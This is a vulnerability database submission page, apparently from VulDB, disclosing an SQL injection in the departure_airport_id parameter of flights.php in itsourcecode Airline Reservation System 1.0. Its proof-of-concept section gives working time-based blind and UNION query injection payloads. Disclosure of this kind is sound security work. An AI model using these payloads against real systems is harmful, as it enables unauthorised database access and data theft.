जमा करें #385895: itsourcecode Airline Reservation System 1.0 SQLiजानकारी

शीर्षकitsourcecode Airline Reservation System 1.0 SQLi
विवरणIn the flights. php page, the occurrence of SQLi injection is due to insufficient filtering of the departure_airport_id parameter. ————POC———— Parameter: departure_airport_id (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: departure_airport_id=4' AND (SELECT 5140 FROM (SELECT(SLEEP(5)))gVLv) AND 'NWps'='NWps&arrival_airport_id=4&date=&date_return=&trip=1 Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: departure_airport_id=4' UNION ALL SELECT CONCAT(0x7176767071,0x424b506d6250536942685a4254456d74566f536244496e6351716f4a6974504149794b5370625a54,0x71767a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&arrival_airport_id=4&date=&date_return=&trip=1
स्रोत⚠️ https://github.com/DeepMountains/zzz/blob/main/CVE1-4.md
उपयोगकर्ता
 quad (UID 73025)
सबमिशन05/08/2024 10:04 AM (2 साल पहले)
संयम05/08/2024 05:45 PM (8 hours later)
स्थितिस्वीकृत
VulDB प्रविष्टि273625 [itsourcecode Airline Reservation System 1.0 flights.php departure_airport_id SQL इंजेक्शन]
अंक20

Might our Artificial Intelligence support you?

Check our Alexa App!